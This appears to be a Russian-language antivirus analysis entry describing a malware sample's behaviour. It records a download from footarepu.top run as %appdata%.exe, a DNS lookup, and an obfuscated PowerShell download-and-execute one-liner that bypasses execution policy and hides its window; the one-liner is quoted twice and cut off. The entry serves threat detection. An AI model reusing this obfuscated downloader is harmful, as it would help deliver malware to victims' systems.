Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "pow^E^RShelL^.e^X^e -ExE^cU^T^Io^nP^O^L^I^cy byp^A^S^s -nOpr^o^FILE -^Wi^nDoWst^Y^lE ^HId^DeN (New^-OBjEC^T^ SY^S^Te^M.ne^t.^W^EBc^LIenT).D^oWnlo^a^d^fIlE(^'http://footarepu.to...
Сетевая активность
UDP
- DNS ASK fo###repu.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "pow^E^RShelL^.e^X^e -ExE^cU^T^Io^nP^O^L^I^cy byp^A^S^s -nOpr^o^FILE -^Wi^nDoWst^Y^lE ^HId^DeN (New^-OBjEC^T^ SY^S^Te^M.ne^t.^W^EBc^LIenT).D^oWnlo^a^d^fIlE(^'http://footarepu.to...' (со скрытым окном)
